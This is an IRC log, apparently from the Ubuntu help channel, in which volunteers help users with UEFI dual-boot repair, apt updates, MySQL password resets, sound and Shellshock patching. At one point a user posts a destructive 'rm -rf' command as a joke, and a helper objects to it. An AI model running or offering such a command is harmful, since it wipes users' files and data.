[18:50] <instigator> Hello. in nano are semicolons used for commenting out lines?
[18:50] <instigator> I know that hashes are used a lot
[18:50] <tatootian> hey how can you install ubuntu on ntfs
[18:50] <snown> daftykins: yeah they see a partition, but it says that the block count exceeds the device size
[18:50] <snown> when I try to mount
[18:50] <SchrodingersScat> instigator: nano doesn't tell you what the language is, nano can read any text file, or really any file.  If it's bash then # is for comments, ; just ends a command
[18:51] <daftykins> snown: no idea then, backup that one then go nuts with recovery software like testdisk etc?
[18:51] <snown> ok thanks daftykins
[18:51] <instigator> SchrodingersScat: thanks
[18:52] <Grimlock1182> Alpy, try to remove xubuntu cd and restart your computer and press F11 and follow the instruction if nothing happen by pressing F11, i think the whole hdd you partition is all ready formatted..
[18:53] <Wulframn> Dat recovery partition ded now. :-(
[18:55] <itisit> chrodingersScat: thanks
[18:55] <Wheelz> EriC^^: I have that already set and did a update-grub. doesnt ask for password
[18:55] <itisit> SchrodingersScat: thanks
[18:56] <EriC^^> Wheelz: it should work, i've tested it once out of curiosity
[18:56] <OliPicard> Hi Guys, is the root repo down at the moment?
[18:56] <EriC^^> Wheelz: it won't let you edit the entry, but it will still boot it without a password
[18:56] <Wheelz> EriC^^: Did you set --users anywhere?
[18:56] <EriC^^> Wheelz: nope, just those
[18:56] <OliPicard> My VPS provider says that an upstream repo by ubuntu is currently down. Just wanted to confirm it.
[18:57] <k1l_> OliPicard: nope
[18:57] <daftykins> OliPicard: what address? use archive.ubuntu.com if you're having issues
[18:57] <angs> how can I install GNU Autotools via apt-get install?
[18:57] <angs> what is the name of the package?
[18:57] <OliPicard> daftykins: http://mirrors.linode.com/ubuntu/dists/trusty-security/main/binary-i386/Packages
[18:57] <etudica> having trouble getting virt-manager to use a "harddrive" over a mounted cifs share
[18:58] <daftykins> OliPicard: ok, so Linode are telling you *their* repo is down. nothing to do with Canonical then
[18:58] <etudica> http://paste.ubuntu.com/8434970/
[18:58] <bekks> etudica: Thats pretty much because it is about to fail, when the share is unavailable.
[18:58] <k1l_> OliPicard: its up. just run "sudo apt-get update"
[18:58] <daftykins> angs: "apt-cache search <thing to search for>"
[18:58] <fellayaboy> whats the difference between find . -name foo & find -name foo
[18:58] <OliPicard> daftykins: Nope they are saying that it's ubuntu's side
[18:58] <daftykins> fellayaboy: good question for #bash
[18:59] <etudica> thanks bekks, is that pretty much a no go architecture?
[18:59] <OliPicard> It appears there is an issue upstream from the repositories which is causing the hash sum mismatch error.  This is due to the root repository having issues, and we need it to be fixed upstream before our repositories can be fixed.
[18:59] <Wulframn> Doesn't the period look in/for hidden files?
[18:59] <fellayaboy> thanks daftykins
[18:59] <bekks> etudica: Exactly. Thats a fail by design.
[19:01] <etudica> bekks: so all guest disks should be real to the host?
[19:02] <bekks> etudica: Yes.
[19:02] <SchrodingersScat> Wulframn: starting a file name with a period makes it 'hidden' but . can also mean the current directory, while .. is the parent directory.
[19:04] <etudica> bekks: thanks again
[19:05] <indn1234> why doesnt Ubuntu 14.04 USb recognise at boot?
[19:05] <indn1234> Windows 7 usb boot is being recognised just fine
[19:06] <daftykins> indn1234: check your download by MD5'ing it and remake the flash drive after full formatting it, best i can suggest.
[19:06] <daftykins> !md5
[19:06] <OliPicard> ok linode is saying the problem is due to  an upstream Ubuntu issue. They've done it previously, and essentially it happens when their upstream repo pushes out new Packages.gz (the list of package metadata) but not new hash lists. Last time, it appeared to be because they'd rolled back the hash list but not the Packages.gz.
[19:07] <daftykins> OliPicard: then it is their problem i'm afraid.
[19:07] <streulma> I installed my 14.04 server with booting in Recovery :)
[19:07] <streulma> by OnApp
[19:07] <streulma> rm -rf /root/hda1 :-O
[19:08] <daftykins> don't share such commands.
[19:08] <Eremo> xDD
[19:08] <Eremo> at least he didnt sudo it
[19:09] <MonkeyDust> streulma  alt-f4 is also fun
[19:09] <Blaster> I had to terminate apt due to unresponsiveness and now when I try to run it, I get "Could not get lock /var/lock/aptitude".
[19:09] <Blaster> Do I just delete the lockfile?
[19:09] <MonkeyDust> !aptlock
[19:10] <CPUlli> hi!
[19:10] <gQuigs> anyone know how to get a users whoopsie identifier via the CL?  (https://bugs.launchpad.net/ubuntu/+source/sosreport/+bug/1319160/comments/2)
[19:10] <Blaster> MonkeyDust: That gives me Specified filename /var/lib/dkpg/lock does not exist.
[19:11] <EriC^^> gQuigs: identifier ? as in uid?
[19:11] <gQuigs> EriC^^:  it's the identifier that goes into :https://errors.ubuntu.com/user/dnfjdnsfj formula
[19:11] <sergio-br2> i'm having a problem with the windows grub entry, i select it and returns to the grub window. UEFI hardware, windows 8 + ubuntu 14.04.
[19:12] <sergio-br2> it was working with 13.10... i did a clean install
[19:12] <EriC^^> gQuigs: link is dead
[19:12] <EriC^^> nevermind
[19:12] <gQuigs> EriC^^ was an example  :)
[19:12] <EriC^^> yeah i got it :)
[19:12] <Matt123> My sound is working at all on Ubuntu :/
[19:13] <gQuigs> Matt123: *not* working?
[19:13] <streulma> MonkeyDust: that doesn't work on my Mac ?
[19:13] <Matt123> Nope, no sound from speakers
[19:13] <sergio-br2> someone knows what i have to change in /boot/grub/grub.cfg ?
[19:14] <jhutchins> sergio-br2: You should be able to run update-grub and it should re-scan and regenerate the menu.
[19:14] <gQuigs> Matt123: tried changing sound outputs in preferences?   (some steps here: https://help.ubuntu.com/community/SoundTroubleshooting
[19:14] <sergio-br2> ok
[19:14] <Matt123> Ill take a look, thanks
[19:15] <streulma> MonkeyDust: you mean CTRL ALT F4 !
[19:17] <sergio-br2> jhutchins, didn't work
[19:17] <gQuigs> I can't fnd where whoopsie stores data or how to query it for data
[19:18] <CPUlli> sergio-br2: if this doesn't work, did you ever try the boot-repair-tool?
[19:18] <sergio-br2> the entry for windows  is "Windows Boot Manager (on /dev/sda3)"
[19:19] <CPUlli> sergio-br2: https://help.ubuntu.com/community/Boot-Repair
[19:20] <Matt123> gQuigs: Soundcard recognized, sound modules installed
[19:20] <sergio-br2> ok, let me see
[19:20] <Matt123> Still no sound though
[19:21] <Talidan> How do you guys reccomend structuring users on Linux? i've seen in the past people creating users for each major app for security
[19:21] <sergio-br2> why ubuntu has too many problems with dual boot / windows uefi entry?
[19:21] <gQuigs> Matt123: does it work if you use a guest session / livecd?
[19:21] <xangua> sergio-br2: because uefi?
[19:21] <daftykins> sergio-br2: it doesn't but users tend to make mistakes installing
[19:21] <sergio-br2> dunno
[19:22] <sergio-br2> in 13.10 it worked like a charm
[19:22] <sergio-br2> now...
[19:22] <CPUlli> sergio-br2: it is not ubuntu who is causing the problems :)
[19:22] <daftykins> common one: installing one OS via legacy, then installing the next as EFI and mixing the two.
[19:22] <Matt123> Already tried that, no success :/
[19:22] <sergio-br2> daftykins, what mistake a user can do in the install?
[19:23] <daftykins> sergio-br2: one like i just described
[19:23] <daftykins> bbl
[19:23] <sergio-br2> it's the system install that find windows in the HD, not the user
[19:24] <CPUlli> sergio-br2: give boot-repair a try
[19:25] <sergio-br2> as i know, it's not user that told grub in the install process that windows is in the hard disk...
[19:25] <sergio-br2> ok, let me see
[19:25] <Matt123> gQuigs: Any ideas?
[19:25] <hircarra> what's the difference between Ubuntu and Linux mint?
[19:25] <gQuigs> Matt123: ^ does it work if you use a guest session / livecd?
[19:25] <xangua> hircarra: that ubuntu is supported here and mint is not
[19:26] <Matt123> It doesn't, already tried
[19:26] <hircarra> why is that though, just curious
[19:26] <Matt123> Wait, hold on
[19:26] <OerHeks> hircarra, mint has its own issues.
[19:26] <sergio-br2> mint has its own issues + ubuntu issues :)
[19:26] <hircarra> yea but why don't you support it in here
[19:26] <sergio-br2> + debian issues
[19:26] <CPUlli> bugs in mint are green ;)
[19:27] <Matt123> gQuigs: Fixed it :) Just went in alskamixer and did something. Not sure what, but it works now.
[19:27] <Wulframn> Mint is a different distro.
[19:27] <Matt123> alsamixer
[19:27] <gQuigs> Matt123: :)
[19:27] <Matt123> thanks for the help
[19:27] <Grimlock1182> CPUlli, no its menthol and so cold..LOL :)
[19:27] <hircarra> still no answer regarding the linux mint
[19:27] <hircarra> why isn't it supported in here?
[19:27] <xangua> !ot I hircarra
[19:27] <sergio-br2> because it's a fork with it's own issues?
[19:28] <xangua> !ot
[19:28] <Wulframn> hircarra: mint is a different distro. It's like taking your truck to a bicycle shop and asking them to change your oil.
[19:28] <Flannel> hircarra: Because the Mint folks make changes (that we don't know about) which makes the software's behavior change (in ways we don't know about).
[19:28] <hircarra> no it's not.  mint and ubuntu are both linux
[19:28] <hircarra> i don't understand
[19:28] <bazhang> hircarra, it's a different distro. this is ubuntu technical support only as well, try ##linux
[19:28] <jhutchins> hircarra: We don't know what mint does differently, what we use and know is Ubuntu.  We just know that Mint is different, and something that might fix ubuntu could easily break mint.
[19:28] <hircarra> there's no place to get linux mint support?
[19:29] <kostkon> !mint
[19:29] <Flannel> hircarra: Sure, but so are Redhat and Arch, neither of which are supported in here, because everyone does things very differently.
[19:29] <Wulframn> Trucks and bicycles are both transportation devices
[19:29] <amdblack> hola buenas trades
[19:29] <amdblack> ai alguien por aqui
[19:29] <sergio-br2> english
[19:29] <hircarra> but there's nobody in the linuxmint help channel
[19:29] <Wulframn> Hola! ¿Como estas?
[19:29] <hircarra> there are 1800 in here
[19:29] <jhutchins> hircarra: use their forums at http://forums.linuxmint.com/ or join #linuxmint-help on irc.spotchat.org
[19:29] <hircarra> so if somebody needs support for linux mint they should come here
[19:29] <OerHeks> or ##linuxmint here on freenode,
[19:30] <Wulframn> hircarra: we do not support Linux mint. It's that simple.
[19:30] <rww> hircarra: Perhaps you should switch to a Linux distribution with competent support, then. Might I suggest Ubuntu?
[19:30] <hircarra> yea by why not
[19:30] <jhutchins> hircarra: No, they should not come here.  This is support for Ubuntu, which is a different system.
[19:30] <Grimlock1182> hircarra, its mean you are own your own..
[19:30] <amdblack> e instalado el open oficce en kubuntu pero no me sale por niguna parte ai que quitar el libre oficce o algo
[19:30] <hircarra> linux mint is very similar to ubuntu
[19:30] <sergio-br2> amdblack, english
[19:30] <Flannel> hircarra: Please stop the mint discussion now, thanks.
[19:30] <rww> hircarra: and yet it's not Ubuntu, so it isn't supported here
[19:30] <OliPicard> how do you report a upstream repo problem?
[19:30] <jhutchins> !es
[19:30] <Wulframn> !tell amdblack kubuntu
[19:30] <xangua> !es | amdblack
[19:30] <hircarra> but if i can't get mint support here
[19:30] <hircarra> there are no alternatives
[19:30] <Wulframn> !kubuntu
[19:31] <Grimlock1182> hircarra, and then use Ubuntu its the best and you recieve a lot help
[19:31] <jhutchins> OliPicard: I'm pretty sure they're aware of it, it's probably related to the backslash fix being pushed out.
[19:31] <amdblack> and installed in kubuntu OFICCE open but I do not get matched by any party to remove ai free OFICCE or something
[19:31] <Wulframn> amdblack: necesitas #kubuntu
[19:32] <amdblack> ok
[19:32] <CPUlli> hircarra: all mint chat users are in the apple store, complaining why mint isn't supported there :)
[19:33] <OliPicard> jhutchins yeah i can imagine it's overloading atm
[19:33] <udne> Does ubuntu have shockshell fix?
[19:33] <OerHeks> udne, update has been send out, yes
[19:34] <jhutchins> OliPicard: I believe there is a known sync problem at this time.
[19:34] <MonkeyDust> udne  read this http://www.linuxbsdos.com/2014/09/25/bash-susceptible-to-environment-variables-code-injection-attack/
[19:37] <Grimlock1182> this is people complain why linus is not support his created anymore why? becuase he can maintain the hardware...LOL
[19:38] <udne> Thanks. I've must have missed the update on console.. Safe ubuntu now..
[19:39] <rabrugu> good day to all, wondering if someone can tell me how to had a second hdd on ssh share in the server.
[19:39] <MonkeyDust> Grimlock1182  people complain, because linux has become user friendly       (joke)
[19:40] <Grimlock1182> MonkeyDust, LOL :)
[19:40] <Wulframn> Linux has become user friendly? When did this become a thing?
[19:40] <rww> !ot
[19:41] <CPUlli> got a problem with xaralx under 14.04, it chrashes while turning objects. It did not under 12.04. Any ideas?
[19:42] <Grimlock1182> ubottu, sorry we just carried away, why linux user is complaining in ubuntu help channel..LOL
[19:43] <dimitry7> hey guys, is saucy been giving support?
[19:44] <dimitry7> i have the main repos on it, but it says bash is updated
[19:44] <xangua> !eol | dimitry7
[19:45] <dimitry7> ubottu, okak perfect, let me see..
[19:45] <dimitry7> haha okay
[19:45] <dimitry7> xangua, thank you man!
[19:45] <Psil0Cybin> LMAO
[19:45] <slava> hello
[19:45] <Psil0Cybin> dimitry7: :D nu class.
[19:45] <slava> what's up
[19:45] <dimitry7> haha :p. Do you know alice?
[19:45] <Psil0Cybin> of course.
[19:46] <dimitry7> once I was really deceived by it... what a shame lol
[19:46] <Psil0Cybin> hahahahha
[19:46] <Psil0Cybin> they get you..
[19:46] <dimitry7> the only thing that made me realise I was talking to a machine was that she typed sooo fast
[19:46] <Guest9752> Hi
[19:46] <dimitry7> hahahah
[19:47] <rww> dimitry7: people accuse me of being a robot because of that sometimes ;(
[19:47] <CPUlli> hi guest9752!
[19:47] <Tobarja> has there been any reports of issues after updating bash for shellshock? (i'm not reporting one, just researching)
[19:47] <Guest9752> Could you please give me a secure way to reset mysql root's password assuming I am root in the console?
[19:47] <Psil0Cybin> hahah rww your a jokster.
[19:47] <Grimlock1182> dimitry7, he is the top AI  bot in counterstrike..LOL
[19:47] <Psil0Cybin> <3 Counter-Strike
[19:48] <rww> Tobarja: issues as in bugs caused by the updates?
[19:48] <Tobarja> rww, yes
[19:48] <rww> Tobarja: not that I've seen
[19:48] <Tobarja> ok, thanks
[19:48] <dimitry7> rww, hahaha
[19:49] <dimitry7> Grimlock1182, Lol!
[19:49] <rww> Guest9752: https://dev.mysql.com/doc/refman/5.0/en/resetting-permissions.html#resetting-permissions-unix
[19:49] <rww> Guest9752: (mysql in Ubuntu runs under the user "mysql")
[19:50] <sergio-br2> ppa:yannubuntu/boot-repair has no trusty package. I know that i can use saucy package. But this program is not update any more?
[19:51] <rww> sergio-br2: PPAs are not officially supported. Contact the PPA maintainer.
[19:51] <sergio-br2> already
[19:51] <dimitry7> judge: are you terrorist? ALICE: I don't know whether or not I am terrorist. I am a machine.
[19:52] <CPUlli> sergio-br2: its doing, just give it a try
[19:54] <Guest9752> rww: but su - mysql does not switch me to root
[19:55] <Eremo> Hi guys, after installing apache2 package, and check it worked, i instaled the libapache2-mod-php5, and activated it by a2enmod php5 command. Restarted apache webserver. But if i try to visit a test.php file wich basic phpinfo(); function on it... it wont output anything when visitting the site... what can be wrong?
[19:55] <rww> Guest9752: sudo -c mysql -i
[19:55] <rww> Guest9752: and those instructions say to run as the mysql user, not the root user
[19:56] <rww> (or to run as root and specify which user to run as as a flag)
[19:56] <Guest9752> rww: oh, sorry, I meant "does not switch me to mysql", of course
[19:57] <BuntuTech> hello ubuntu support channel
[19:57] <rww> Guest9752: right. Use the sudo command instead; su on Ubuntu is not particularly useful
[19:57] <rww> Guest9752: and I can't type, it's sudo -u mysql -i
[19:57] <BuntuTech> i have a question about updating ubuntu 14.04.1 lts
[19:58] <Guest9752> rww: ah, OK and thank you, anyway seems like I have found a way simpler way of changing root password with the old being forgotten: dpkg-reconfigure mysql-server-5,5
[19:58] <Guest9752> *5.5
[19:58] <Guest9752> (or the relevant version)
[19:59] <BuntuTech> is it best-or-aleast equally effective-to update using the terminal-or is i best to use the software updater that is built into the launcher?
[19:59] <k1l_> BuntuTech: just ask
[19:59] <rww> BuntuTech: they both do the same thing
[19:59] <k1l_> BuntuTech: both use the same apt in background. so its your choice
[19:59] <Nexuus> makes no difference BuntuTech
[19:59] <BuntuTech> well - i am not sure that is true because when i do the software updater - and then do the terminal - the terminal updates some more
[20:00] <BuntuTech> and also...
[20:00] <i-fun> any great OBD2/can apps for ubuntu
[20:00] <BuntuTech> when i do the software updater - and then do terminal 2nd - it once again - updates even more
[20:00] <BuntuTech> in fact - i have never once (lately) been able to do only one of them and then been finished
[20:01] <CPUlli> rww: it was a trap :)
[20:01] <MonkeyDust> BuntuTech  yes, i even use a custom script to update
[20:01] <Guest9752> fww : sudo -u mysql -i gives
[20:01] <Guest9752> "sudo: unable to change directory to /nonexistent: No such file or directory
[20:01] <Guest9752> sudo: unable to execute /bin/false: No such file or director"
[20:01] <BuntuTech> they said either one is supposed to work thus i dont know why ur saying that MonkeyDust
[20:01] <babbelnet> Hi there, I've created a folder thus name contains control characters (ls prints: ?[3~?[4~foo) - how can I delete this folder? I can't do rm -rf * since there are folders I can't move. I've only SSH access
[20:02] <MonkeyDust> BuntuTech  the script does more than just update, you cant do that with the gui updater, that's why
[20:03] <sosby> So I set a monitor to off in the Displays settings interface and it then disappeared from the list of displays. How should I go about reenabling the monitor again? xD
[20:03] <BuntuTech> so ur saying that terminal AND software updater do not actually completely do the job- MonkeyDust ?
[20:03] <`packy> i upgraded to 14.04 and lost my menus... only thing left is a couple links on my desktop,
[20:03] <k1l_> BuntuTech: they do
[20:04] <MonkeyDust> BuntuTech  no, what i'm saying is, that you can make combination scripts in the terminal, somethiong you can't with the gui
[20:04] <k1l_> BuntuTech: its just that the gui doesnt prompt every day for regular updates (that are not security updates). because its annoying to regular users.
[20:04] <dimitry7> do you think the bash vulnerability could bypass iptables?
[20:04] <BuntuTech> i would really appreciate it if someone would explain too me how to update it all- all at once
[20:05] <BuntuTech> as i said i have to do both to be sure i get it all
[20:05] <k1l_> dimitry7: just update and get the ubunut patches and be fine
[20:05] <CPUlli> hircarra: mint is still not supported in here ;)
[20:05] <hircarra> but why not?
[20:05] <dimitry7> k1l_, yes I did, but my boss does not want to... because he says his machine is protected with iptables :S
[20:05] <MonkeyDust> BuntuTech  sudo apt-get update;sudo apt-get upgrade    does that
[20:06] <CPUlli> hircarra: for the same reason your butcher does not sell potatoes
[20:06] <BuntuTech> then why when im done doing that - do i get lots of updates in my software updater?
[20:06] <k1l_> hircarra: mint is not supported here. if you have support issues with ubuntu go to the mint channel that are made autjoin in your irc client. thanks
[20:06] <OerHeks> hircarra, join ##linuxmint here on freenode,
[20:06] <Pici> BuntuTech: Are you not using apt-get dist-upgrade?
[20:06] <rww> k1l_: s/ubuntu/mint/, I think ;)
[20:06] <dimitry7> k1l_, besides, he only uses his lap from the internal network but i don't know if its still at risk
[20:06] <k1l_> *with mint (that is)
[20:07] <BuntuTech> i dont want to upgrade i am on 14 04 1   just update
[20:07] <Pici> !dist-upgrade | BuntuTech
[20:07] <BuntuTech> i am quite happy with my current lts version
[20:07] <Pici> A dist-upgrade is not a release upgrade.
[20:07] <k1l_> BuntuTech: please make sure you know the commands before you make wrong statements that updates dont work :/
[20:07] <BuntuTech> ok
[20:07] <BuntuTech> ive been doing sudo apt-get update
[20:08] <sergio-br2> CPUlli, rww, boot-repair didn't worked
[20:08] <Pici> BuntuTech: Just 'update' ?
[20:08] <BuntuTech> then opening the software tool and doing that
[20:08] <BuntuTech> yes
[20:08] <BuntuTech> so isit all messed up now?
[20:08] <k1l_> BuntuTech: apt-get update < will not update your ubuntu. it will only get a fresh list of packages from the server
[20:08] <Pici> BuntuTech: "update" does not install anything.  It just downloads the list of new package versions.
[20:08] <CPUlli> sergio-br2: what did it say on the screen?
[20:08] <BuntuTech> omg
[20:08] <BuntuTech> i knew something was wrong
[20:08] <sergio-br2> paste.ubuntu.com/8435371/
[20:08] <k1l_> BuntuTech: you please read into "apt-get" docs before you say it doesnt work
[20:09] <BuntuTech> so what exactly step by step should i do when i want to check and install all updates?
[20:09] <mic10> ciao
[20:09] <k1l_> BuntuTech: "sudo apt-get update && sudo apt-get dist-upgrade"
[20:09] <mic10> !lisst
[20:09] <sergio-br2> there is no way i can edit grub.cfg manually ?
[20:09] <BuntuTech> ok so it is a 2 step process in the terminal
[20:09] <sergio-br2> shit, i had to do a backup of this
[20:09] <Eremo> my php problem was , the test.php file didnt had read persmissions thats why it didnt show up to website visitors (just me) thanks
[20:10] <MonkeyDust> BuntuTech  this is what i use http://paste.ubuntu.com/8435398/ , http://paste.ubuntu.com/8435403/
[20:10] <BuntuTech> so is it only one step if i just do it in software updater?
[20:10] <k1l_> BuntuTech: yes
[20:10] <BuntuTech> ok so i may as well just do that then if it is one step
[20:10] <linuxlite1969> bash ? patch
[20:10] <Pici> BuntuTech: The software upgrader still  performs both steps in the background.
[20:11] <linuxlite1969> ok
[20:11] <k1l_> linuxlite1969: just run the updates
[20:11] <linuxlite1969> ok update now thank
[20:11] <BuntuTech> ahhhh ok ty pici and kil and MonkeyDust  and anyone else who helped out
[20:11] <Pici> np :)
[20:12] <BuntuTech> im glad the updater does both functions in one step very smart
[20:12] <sergio-br2> man... if this laptop was not mine...
[20:12] <sergio-br2> but the person will need windows
[20:13] <sergio-br2> why dual boot in uefi is so painfull
[20:13] <CPUlli> sergio-br2: it found a winloader on dev/sda3
[20:13] <MyWay> when I boot ubuntu 14.04 (raid), sometimes it start, sometimes I get a black screen, how can I find what's happening? maybe filtering dmesg's output?
[20:13] <BuntuTech> recovery
[20:14] <linuxlite1969> update ok to bash linux lite 18
[20:14] <michele_> how to remove the kworker process in ubuntu 14.04?
[20:14] <k1l_> linuxlite1969: we dont know linux lite. this is the ubunut support
[20:14] <rww> linuxlite1969: Linux Lite is not a supported derivative of Ubuntu. Please contact your distribution vendor for support.
[20:16] <linuxlite1969> ok bash update 100%
[20:16] <MisterCoinMC> Anyone here ever use a "hybrid MBR' to fix dual boot ubuntu and osx?
[20:17] <CPUlli> sergio-br2: did you try ubcd already? link:http://www.ultimatebootcd.com/
[20:17] <BuntuTech> i would like a ubuntu COA for my computer
[20:18] <MonkeyDust> what's COA?
[20:18] <MisterCoinMC> If anyone got any advice on how to resolve this, or if the hybrid MBR will fix the little "black screen with blinking cursor" problem, pm me :3
[20:18] <MisterCoinMC> cheers
[20:19] <zyn3> Are some of the repos not compatible with older versions like 11.04?
[20:19] <metempsychosis> hi! I just installed the proprietary drivers for NVIDIA but now the aspect ratio is so off, I can't open anything or even make adjustments via the terminal or the NVIDIA config GUI
[20:19] <metempsychosis> GeForce 430
[20:20] <bubbasaures> zyn3, Yes, you should if you can run a supported release.
[20:20] <k1l_> zyn3: if you have 11.04 upgrade asap. or better do a fresh install of a supported release like 12.04 or 14.04 because you will need 2 upgrade to get to 12.04
[20:20] <CPUlli> sergio-br2: try to boot /dev/sda3 with boot manager tool from ubcd
[20:22] <sergio-br2> CPUlli: pastebin.com/SF3Y9mKd
[20:23] <sergio-br2> CPUlli: www.pastebin.com/SF3Y9mKd
[20:23] <michele_> I have kworker process in top of the list hiw to solve? It consume about 20% of cpu help!
[20:25] <linuxlite1969> Bash Atack for Bill Gates ????????
[20:25] <k1l_> linuxlite1969: not in here please
[20:25] <CPUlli> sergio-br2: use the boot manager tools from ubcd to test if the partitions are intact enough to be booted
[20:26] <sergio-br2> CPUlli, there are files like bkpbootmgfw.efi, bootmgfw.efi, bootmgr.efi, bootx64.efi, in /boot/efi/EFI/Microsoft/Boot/
[20:27] <sergio-br2> there is no other way?
[20:28] <jcl> hi all, not sure if this is due to upgrading from 13.10 to 14.04, but after upgrading and a reboot, i can't access the bond0:0 interface on my system but i can hit bond0, even though both show as up.
[20:28] <jcl> both are on the same subnet, just different 4th octets
[20:29] <CPUlli> sergio-br2: the tools on ubcd simply give you the choice to boot a partition of you hdd. there is also a win partition on dev/sda5
[20:33] <CPUlli> sergio-br2: it will be the fastest way to find out, if the part. is still bootable
[20:33] <sergio-br2> i need to burn a CD? or use a flash usb?
[20:34] <CPUlli> sergio-br2: you can create a bootable usbstick with unetbootin with the image
[20:34] <jcl> anyone? any theories on why i would be able to access bond0 but not bond0:0 even though both are up (and on the same subnet)? I just upgraded from 13.10 to 14.04 and rebooted, /etc/network/interfaces hasn't changed.
[20:34] <sergio-br2> shit
[20:34] <sergio-br2> ok, thanks
[20:35] <MyWay> when I boot ubuntu 14.04 (raid), sometimes it start, sometimes I get a black screen, how can I find what's happening? maybe filtering dmesg's output?
[20:35] <sergio-br2> the big shit in this laptop, that there is no way of boot from other SO in the bios
[20:36] <sergio-br2> all uefi hardware i got until now, it's possible
[20:36] <sergio-br2> grub independent
[20:36] <sergio-br2> and this sony vaio shit does not have this
[20:37] <CPUlli> sergio-br2: maybe its a hidden function, did you try press esc while starting, or F1?
[20:38] <OerHeks> sergio-br2, which vaio ?
[20:38] <sergio-br2> it uses a assist button, to you access the bios
[20:38] <sergio-br2> let me see the version
[20:39] <sergio-br2> OerHeks, i think it's SVF1421C5E
[20:39] <sergio-br2> OerHeks, product version C10JC5R5, name SVF1421C5E
[20:40] <sosby> So I set a monitor to off in the Displays settings interface and it then disappeared from the list of displays. How should I go about reenabling the monitor again? xD
[20:40] <CPUlli> sergio-br2: press F2 while you see sony logo after startup shows bootmenu?
[20:43] <sergio-br2> CPUlli, no
[20:43] <CPUlli> sergio-br12: F12?
[20:43] <ulrichard_> do debian/install files work differently if python_distutils is used?
[20:44] <sergio-br2> CPUlli, no either
[20:44] <OerHeks> ulrichard_, do not mix debian and ubuntu
[20:45] <CPUlli> sergio-br2: Oh, its Assist+F2
[20:45] <sergio-br2> you can go to Bios only by pressing Assist button, in the side of Power button
[20:45] <sergio-br2> hum,
[20:45] <ulrichard_> OerHeks: I'm not aware of a different packaging system
[20:46] <sergio-br2> CPUlli, no either
[20:47] <erenkisa> hi i ve a tv tuner but i am living a problem on installing
[20:47] <CPUlli> sergio-br2: no way to enter the bios?
[20:47] <erenkisa> it is lifeview flytv prime spo
[20:47] <erenkisa> how do i install correctly
[20:48] <sergio-br2> as i said CPUlli, i can enter Bios with Assist button. But inside it, there is no option to boot to windows, like all uefi hardware does
[20:49] <sergio-br2> someone here, that have a sony vaio, can show me the grub.cfg?
[20:49] <CPUlli> sergio-br2: but you can deactivate secure boot there and change the boot order to boot from cd
[20:49] <sergio-br2> the secure boot is already deactivate
[20:49] <sergio-br2> but i don't have a cd
[20:49] <sergio-br2> only flash drive
[20:50] <sergio-br2> *usb
[20:52] <Jordan_U> sergio-br2: How did you prepare the USB drive?
[20:52] <sergio-br2> unetbootin
[20:53] <sergio-br2> it booted with uefi support, for sure
[20:53] <Jordan_U> sergio-br2: What do you mean by "it booted with uefi support"?
[20:53] <sergio-br2> well, the boot with uefi and legacy is different
[20:54] <sergio-br2> you can notice it
[20:54] <sergio-br2> uefi boot goes to a grub liked window
[20:54] <Jordan_U> sergio-br2: So your computer booted via UEFI, but didn't boot from your USB drive. Correct?
[20:55] <sergio-br2> no, it booted from my USB drive
[20:55] <sergio-br2> why?
[20:56] <Zune>  https://www.youtube.com/watch?v=BaACrT6Ydik#t=14 hihi unix
[20:56] <bondmain> YouTube Title: 	Juicy J, Wiz Khalifa, Ty Dolla $ign - Shell Shocked ft. Kill The Noise & Madsonik [Official Video]
[20:57] <Jordan_U> sergio-br2: Ahh, then I'm misunderstanding the problem. Would you mind giving a quick summary of the problem you're having?
[20:57] <k1l_> !ot | Zune
[20:57] <Zune> my bad
[20:57] <k1l_> !ping
[20:58] <OERIAS> ping? Pong?
[20:58] <OERIAS> nevermind
[20:59] <sergio-br2> Jordan_U, i installed Ubuntu 14.04.1 64 amd64 in dual boot with windows 8, in a sony vaio laptop, name SVF1421C5E, version C10JC5R5. Ubuntu boots, but windows don't. There is a entry for it in grub, but when I select it come back to the same grub select screen. And i'm in the shit, because there is no option to boot to windows or ubuntu in the Bios, like all UEFI hardware has. Sony fucked me.
[21:00] <Jordan_U> sergio-br2: Please watch your language.
[21:00] <sergio-br2> sorry
[21:00] <Jordan_U> !bootinfo | sergio-br2
[21:04] <Jordan_U> sergio-br2: Please run boot info script, post the RESULTS.txt it produces to http://pastebin.ubuntu.com , and provide the link to your paste here.
[21:05] <sergio-br2> ok
[21:06] <CPUlli> sergio-br2: did you tried sudo update grub already?
[21:06] <sergio-br2> yeah
[21:08] <sergio-br2> Jordan_U, CPUlli, www.pastebin.ubuntu.com/8435731
[21:08] <sergio-br2> Jordan_U, CPUlli, pastebin.ubuntu.com/8435731
[21:09] <CPUlli> sergio-br2:http://ubuntuforums.org/showthread.php?t=2126389
[21:10] <Jordan_U> sergio-br2: Your EFI System Partition is missing /EFI/Microsoft/Boot/bootmgfw.efi , which is a critical Windows file.
[21:11] <sergio-br2> there is this file in /boot/efi/Microsoft/Boot/bootmgfw.efi  and in /boot/efi/EFI/Microsoft/Boot/bootmgfw.efi
[21:12] <sergio-br2> hum, info in the forum, cool
[21:12] <CPUlli> sergio-br2: at least they have the same problem ;)
[21:15] <devil> hi
[21:16] <CPUlli> sergio-br2: how about this? :http://ubuntuforums.org/showthread.php?t=2234680
[21:16] <Jordan_U> sergio-br2: Please pastebin the output of "find /boot/efi/".
[21:17] <cyroul> hello
[21:19] <sergio-br2> Jordan_U pastebin.ubuntu.com/8435784
[21:20] <sergio-br2> pastebin.ubuntu.com/8435784
[21:21] <The_Woodsman> does anyone know why ubuntu would fail to load only certain website? i'm working on a wordpress site and, although i can access it on my phone, i can't access it on my laptop (both chrome and firefox just hang while loading)
[21:21] <The_Woodsman> also i can't use wget on the wordpress site, even though it works on literally any other site i've tried
[21:22] <daftykins> The_Woodsman: to download the zip?
[21:23] <The_Woodsman> daftykins: if i use wget on this site, it just hangs at 'connecting to blahblah.org...'
[21:23] <Jordan_U> sergio-br2: Can you be at the grub shell and on IRC at the same time (from another computer)?
[21:23] <sergio-br2> yeah
[21:23] <daftykins> The_Woodsman: sounds like your system is misconfigured. test an "nslookup domain.com"
[21:23] <Jordan_U> The_Woodsman: Are you hosting the website on your own server, in your house?
[21:24] <The_Woodsman> Jordan_U: nope, the server is hosted by a service, and i know the server is still active because i can visit it on my phone
[21:24] <The_Woodsman> daftykins: i'll do that, one sec
[21:24] <k1l_> The_Woodsman: phone means 3g and pc means wifi?
[21:24] <Jordan_U> The_Woodsman: Is your phone connected to your Wifi, or 3/4g data?
[21:25] <The_Woodsman> Jordan_U: mobile data right now, i just put the phone bit in to indicate that the server is definitely running. want me to put it on the wifi and see what happens?
